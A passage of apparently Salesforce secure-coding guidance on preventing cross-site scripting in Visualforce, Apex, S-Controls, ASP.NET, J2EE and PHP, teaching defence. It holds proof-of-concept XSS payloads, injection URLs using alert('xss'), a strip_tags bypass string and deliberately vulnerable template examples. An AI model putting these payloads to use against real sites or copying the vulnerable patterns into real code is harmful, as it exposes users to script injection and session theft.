//tell client to wait a bit here..
client.query("SELECT Name FROM Account LIMIT 1", function(record){
render(record.records[0].Name);
}
);
};
function render(name) {
var record = {
Id: "click me!",
Name: name //for 2: \x22); alert(1); //
};
$('#mainContainer').empty();
$('#mainContainer').append(compiled1(record)); //pops
$('#mainContainer').append(compiled2(record)); //does not pop
$('#mainContainer').append(compiled3(record)); //pops
$('#mainContainer').append(compiled4(record)); //does not pop
}
</script>
</apex:page>ESAPI and Encoding within Apex
Encoding within the controller is strongly discouraged as you should encode as close to the rendering context as possible. Whenever encoding occurs within a controller, a dependency is created between the View and the Controller, whereas the controller should be agnostic to how the data is rendered. Moreover, this pattern is not robust because the visualforce page may want to render the same variable in several different contexts, but the controller can only encode in one.
Do not attempt to generate HTML code or javascript code in the controller.
String usertext = ApexPages.currentPage().getParameters().get('usertext');
// the next line encodes the usertext similar to the VisualForce HTMLENCODE function but within an Apex class.
usertext = ESAPI.encoder().SFDC_HTMLENCODE(usertext);Do not use the built in Apex String Encoding functions: String.escapeEcmaScript(), String.escapeHtml3(), and String.escapeHtml4(). These functions are based on Apache's StringEscapeUtils package which was not designed for security encoding and should not be used.
Dangerous Programming Constructs
The following mechanisms do not have built-in auto-HTML encoding protection and should in general be avoided whenever possible.
S-Controls and Custom JavaScript Sources
<apex:includeScript value="{!$CurrentPage.parameters.userInput}" />S-Control Template and Formula Tags
S-Controls give the developer direct access to the HTML page itself and includes an array of tags that can be used to insert data into the pages. S-Controls do not use any built-in XSS protections. When using the template and formula tags, all output is unfiltered and must be validated by the developer.
The general syntax of these tags is: {!FUNCTION()} or {!$OBJECT.ATTRIBUTE}.
<a
href="https://example.com/integration?sid={!$Api.Session_ID}&server={!$Api.Partner_Server_URL_130}”>Go
to portal</a><a
href="http://partner.domain.com/integration? sid=4f0900D30&server=https://MyDomainName.my.salesforce.com/services/Soap/u/32.0/4f0900D30000000Jsbi">Go
to portal</a><html>
<head>
<title>{!$Request.title}</title>
</head>
<body>
Hello world!
</body>
</html>https://example.com/demo/hello.html?title=Hola<html>
<head>
<title>Hola</title>
</head>
<body>
Hello world!
</body>
</html>https://example.com/demo/hello.html?title=Adios%3C%2Ftitle%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E<html><head><title>Adios</title><script>alert('xss')</script></title></head><body>Hello
world!</body></html><html>
<head>
<title>
{!HTMLENCODE($Request.title)}
</title>
</head>
<body>
Hello world!
</body>
</html><script>var ret = "{!$Request.retURL}";</script>https://example.com/demo/redirect.html?retURL=xyz%22%3Balert('xss')%3B%2F%2Fwould result in <script>var ret = "xyz";alert('xss');//”;</script>
<script>
// Encode for URL
var ret = "{!URLENCODE($Request.retURL)}";
window.location.href = ret;
</script><script>
// Encode for JS variable that is later used in HTML operation
var title = "{!JSINHTMLENCODE($Request.title)}";
document.getElementById('titleHeader').innerHTML = title;
</script><script>
// Standard JSENCODE to embed in JS variable not later used in HTML
var pageNum = parseInt("{!JSENCODE($Request.PageNumber)}");
</script>Formula tags can also be used to include platform object data. Although the data is taken directly from the user’s org, it must still be escaped before use to prevent users from executing code in the context of other users (potentially those with higher privilege levels.) While these types of attacks would need to be performed by users within the same organization, they would undermine the organization’s user roles and reduce the integrity of auditing records. Additionally, many organizations contain data which has been imported from external sources, which may not have been screened for malicious content.
General Guidance for Other Platforms
This section briefly summarizes XSS best practices on other platforms.
Allowing HTML injection
If your application allows users to include HTML tags by design, you must exercise great caution in what tags are allowed. The following tags may allow injection of script code directly or via attribute values and should not be allowed. See HTML 5 Security Cheat Sheet for details.
Unsafe HTML Tags:
<applet> <body> <button> <embed> <form> <frame> <frameset> <html> <iframe> <image> <ilayer> <input> <layer> <link> <math> <meta> <object> <script> <style> <video>
Be aware that the above list cannot be exhaustive. Similarly, there is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.
Instead, it makes more sense to create a well-defined known-good subset of HTML elements and attributes. Using your programming language’s HTML or XML parsing library, create an HTML input handling routine that throws away all HTML elements and attributes not on the known-good list. This way, you can still allow a wide range of text formatting options without taking on unnecessary XSS risk. Creating such an input validator is usually around 100 lines of code in a language like Python or PHP; it might be more in Java but is still very tractable.
HTTP Only Cookies
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie evaluate to a blank string when JavaScript code tries to read it. (Some browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS, it is only a way to briefly slow down attackers exploiting XSS with the simplest possible attack payloads. It is not a bug or vulnerability for the HttpOnly flag to be absent.
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may need to allow legitimate users to create and/or upload custom HTML, Javascript or files. This feature could be misused to launch XSS attacks. For instance, a lower privileged user could attack an administrator by creating a malicious HTML file that steals session cookies. The recommended protection is to serve such arbitrary content from a separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com. Even if customers can upload arbitrary content, you can always serve the content from an alternate domain that is outside of the scoping of any trusted cookies (session cookies and other sensitive information). As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie since sessions scoped to app.site.com would not be sent to content.site.com. If the data being stored is sensitive, a one time use or short lived token should be used. This is the method that Salesforce uses for our content product.
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS, and for which the same defensive strategies apply. Response splitting occurs when user data is inserted into an HTTP header returned to the client. Instead of inserting malicious script, the attack is to insert additional newline characters. Because headers and the response body are delimited by newlines in HTTP, this allows the attacker to insert their own headers and even construct their own page body (which might have an XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
ASP.NET provides several built-in mechanisms to help prevent XSS, and Microsoft supplies several free tools for identifying and preventing XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1 and 2.0 can be found at the Microsoft Patterns & Practices site: Howto Prevent XSS in ASP
By default, ASP.NET enables request validation on all pages, to prevent accepting of input containing unencoded HTML. (For more details see http://www.asp.net/learn/whitepapers/request-validation/.) Verify in your Machine.config and Web.config that you have not disabled request validation. Identify and correct any pages that may have disabled it individually by searching for the ValidateRequest request attribute in the page declaration tag. If this attribute is not present, it defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>.
If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode for escaping output to pages. These methods are safe, but follow a “blocklist” approach that encodes only a few characters known to be dangerous. Microsoft also makes available the AntiXSS Library that follows a more restrictive approach, encoding all characters not in an extensive, internationalized allowlist.
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET. CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as several other classes of security flaw. Visual Studio has built-in static analysis features that can help identify security vulnerabilities:https://learn.microsoft.com/en-us/visualstudio/code-quality/overview-of-code-analysis-for-managed-code
J2EE web applications have perhaps the greatest diversity of frameworks available for handling user input and creating pages. Several strong, all-purpose libraries are available, but it is important to understand what your particular platform provides.
Input Filtering
<plug-in className="org.apache.struts.validator.ValidatorPlugIn">
<set-property property="pathnames" value="/WEB-INF/validator-rules.xml"/>
</plug-in>Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here: Java Regex Documentation.
The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here: Spring Validation.
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs or in XML, and expressing custom constraints as Java classes or in a variety of scripting languages. The system is quite powerful, implements Programming by Contract features using AspectJ, and provides some built-in support for frameworks like Spring. Learn more about OVal at: OVal
Output Filtering and Encoding
JSTL tags such as <c:out> have the excapeXml attribute set to true by default, This default behavior ensures that HTML special characters are entity-encoded and prevents many XSS attacks. If any tags in your application set escapeXml="false" (such as for outputting the Japanese yen symbol) you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true by default for <h:outputText> and <h:outputFormat>.
Other page generation systems do not always escape output by default. Freemarker is one example. All application data included in a Freemarker template should be surrounded with an <#escape> directive to do output encoding (e.g. <#escape x as x?html>) or by manually adding ?html (or ?js_string for JavaScript contexts) to each expression (e.g. ${username?html}).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("HTTP_REFERER") %>) or scriptlets (e.g. <% out.println(request.getHeader("HTTP_REFERER") %>) should be avoided.
If you are using a custom page-generation system, one that does not provide output escaping mechanisms, or building directly with scriptlets, there are several output encoding libraries available. The OWASP Enterprise Security API for Java is a mature project that offers a variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output springs safely for HTML, JavaScript and several other contexts. Get it here: OWASP Enterprise Security API (ESAPI)
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at: PHP Data Filtering Library.
Two types of filters can be declared: sanitization filters that strip or encode certain characters, and validation filters that can apply business logic rules to inputs.
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", ', <, and >, while htmlentities encodes all HTML characters with defined entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags function is also available to return a string with all HTML and PHP tags removed, but because this function is implemented with a regex that does not validate that incoming strings are well-formed HTML, partial or broken tags may be able to bypass the system. For example, the string <<b>script>alert('xss');<</b>/script> might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>. If you are going to rely on this function, input must be sent to an HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss'). Does it work in your version?)